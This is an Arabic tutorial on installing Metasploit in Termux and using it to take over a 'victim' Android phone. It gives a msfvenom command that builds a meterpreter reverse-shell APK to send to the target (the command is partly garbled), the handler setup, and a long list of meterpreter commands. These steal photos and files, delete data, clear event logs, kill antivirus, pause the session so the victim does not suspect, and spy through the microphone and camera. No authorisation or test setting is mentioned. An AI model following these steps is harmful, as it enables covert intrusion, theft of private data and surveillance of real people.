تثبيت اداه الميتاسبلوت علي Termux واختراق جهاز الضحيه وجلب الصور والبينات الخاص من termux بامرين فقط

السلام عليكم ورحمة الله وبركاته 

شرح تثبيت اداه الميتاسبلوت علي termux بامرين فقط واختراق جهاز الضحيه

  الميتاسبلويت فرامورك / metasploit framework  

هي اداة غنية عن التعريف حيث تحتوي على العديد من الثغرات و استغلالها في اختبار الاختراق (اختراق هواتف ، حواسيب ، مواقع...والحصول علي صور وبينات الضحيه...... الخ) وهي بالمناسبة مبرمجة بلغة ruby
ويمكنك من خلال هذه الاداه metasploit-framework يعد تثبيت اداه الميتاسبلوت يمكنك انشاء بايلود وعمل رابط وارساله للضحيه واختراق الهاتف او الجهاز باكمله والحصول علي بيناته من الصور وايضا يمكنك اخذ نسخه من ملفات الضحيه وفيما يلي شرح تثبيت الاداه وبدأ الاختراق بها. 

والان اصبح يمكن تثبيتها من تطبيق ترمكس بأمرين فقط وهما : 

apt update && apt upgrade -y 

هذا الامر لتحديث الحزم داخل termux لتجنب حدوث مشاكل (: 

pkg install unstable-repo -y 

pkg install metasploit 

وسوف يطلب منك  الموافقه اكتب له حرف y ومن ثم انتر وسوف يكمل التحميل بدون مشاكل وسوف تأخذ منك بعض الوقت على حسب قوة الانترنت عندك و عندما تكمل التثبيت تفتحها بالامر 

msfconsole 

والان اوامر اختراق الضحيه وصنع البايلود الاختراق 

اوامر اختراق بالميتاسبلويت

أولا صنع بايلود :

./msfvenom -p android/meterpreter/reverse_tcp http://127.0.0.1 lport=4444 r > /sdcard/venom.apk

طبعا ضع في مكان كلمة lhost الإيبي الخاص بك وفي مكان lport ضع البورت اي بورت مفتوح في الروتر او البورت الخاص بالميتا 4444

ثانيا أمر فتح أداة MetaSploit :

./msfconsole

ثالثا بعد الدخول على أداة MetaSploit :

$ use exploit/multi/handler 

$ set payload android/meterpreter/reverse_tcp

$ set lhost ...... الايبي

$ set lport ......البوررت 4444

$ run

$ help

$ shell

$ cd /sdcard

$ ls

رابعا أوامر التحكم في الضحيه :

لإعادة تشغيل جهاز الضحية :

 reboot 

-------------------------------------------------

 لإطفاء جهاز الضحية :

 shutdown 

------------------------------------------------ 

 لإظهار معلومات حول نظام الضحية مثل نظام التشغيل و لغة الجهاز :

 sysinfo 

-----------------------------------------------

 لإلتقاط صورة من شاشة الضحية : 

screenshot 

---------------------------------------------- 

 لإظهار اتصالات الشبكة وجميع التطبيقات و الملفات المتصلة بالأنترنت و المستهلكة للأنترنت : 

netstat 

--------------------------------------------- 

 للدخول الى الملفات الداخليه و كتابة الأوامر وكأنك في جهاز الضحية : 

shell 

--------------------------------------------- 

لإقلاع أي تطبيق على جهاز الضحية بأمر واحد منك أكتب هذا الأمر : 

execute -f Ahmed.apk 

طبعا غير Ahmed إلى إسم التطبيق الذي تريده أن يشتغل.

--------------------------------------------- 

لإظهار جميع البرامج التي تشتغل في جهاز الضحية اكتب : 

ps 

--------------------------------------------- 

 لرفع أي ملف من عندك الى جهاز الضحية : مثال : upload /sdcard/Ahmed.apk \Ahmed.apk

استبدل Ahmed بإسم الملف أو التطبيق أو اي شيء تريد رفعه.

طبعا هذا بعد الدخول الى مكان التطبيق أو الصوره أو أي شيء وطبعا للدخول إلى ملفات الضحيه نفذ هذا الأمر :

cd /sdcard

--------------------------------------------- 

 لتحميل أي ملف أو صورة من جهاز الضحية الى جهازك : 

download Ahmed.apk

غير اسم Ahmed الى اسم الملف و أيضا صيغة apk الى صيغة الملف.

طبعا هذا بعد الدخول الى مكان التطبيق أو الصوره أو أي شيء وطبعا لدخول إلى ملفات الضحيه أطلب الأمر :

cd /sdcard

--------------------------------------------- 

أوامر مهمه :

أولا هذا الامر :

بعد دخولك مباشر على الضحيه 

cd /sdcard

                        sdcard هذا مكان الذاكره الداخليه

أما اذا طلبت 

cd /sdcard1

                    sdcard1 هذا مكان الذاكره الخارجيه

أما معنى cd فهو أمر فتح الملفات 

يمكنك أن تكتب أمر .. cd للرجوع الى الوراء

وأيضا للدخول لملف أكتب :

 cd Ahmed

قم بإستبدال Ahmed بإسم الملف الذي تريد ذهاب اليه.

أما هذا الأمر pwd يبين لك اسم المكان الذي تتواجد به من البدايه للنهايه.

وأيضا هذا الأمر ls يظهر لك الملفات الموجودة و أين أنت أيضا.

وأيضا Ctrl+l هذا لمسح الكلام الذي يتواجد في الشاشه.

----------------------------------------------- 

هذا الأمر لحذف أي ملف : 

rm (Ahmed)

قم بإستبدال Ahmed الى الملف او البرنامج او الصورة الذي تريد ان تحذفها.

-----------------------------------------------  

لإغلاق جلسة الاختراق لفترة معينة من الزمن طبعا هذا مهم حتى لا يشك الضحية : 

sleep 5 

غير 5 الى عدد الثواني التي تحب فيها غلق جلسة الاختراق يمكنك وضع ساعة عن طريق كتابة 3600 أي 3600 تانية = ساعة.

----------------------------------------------- 

لمسح سجل الأحدات و الإختراق (تفيد في الحماية) : clearev 

----------------------------------------------- 

هذا الأمر مفيد جدا دوره تعطيل جميع مضادات الفيروسات في جهاز الضحية : 

run killav.rb 

----------------------------------------------- 

للتجسس على مايك mic الخاص بالضحية و سماع كل ما يقوله الضحية : 

record_mic -d 5 

غير 5 الى عدد الـثواني الذي تريد تسجيل الصوت فيها متلا 60 يسجل كل ما يقوله الضحية لمدة دقيقة. 

طبعا الزمن بالتانية s 

---------------------------------------------- 

لإلتقاط صورة من كاميرا الجهاز :

 webcam_snap 

---------------------------------------------- 

لمشاهدة كل ما يفعله الضحية من الكاميرا أي التجسس على الكاميرا : 

webcam_stream -d 60 

غير 60 الى عدد الثواني الذي تريده.

وهذه أوامر الأخرى :

1-bgkill قفل برامج الضحية

2-bglis البرامج التي شغالة عند الضحية

3-exit للخروج

4-help للمساعدة

5-info استخراج معلومات

6-migrate للعب بالبروسسر و تنقل الباك دور

7-read للقراءة

8-run لتشغيل برامج الضحية

9-use است

اخمط بذكر المصدر

   رجائا اترك تعليق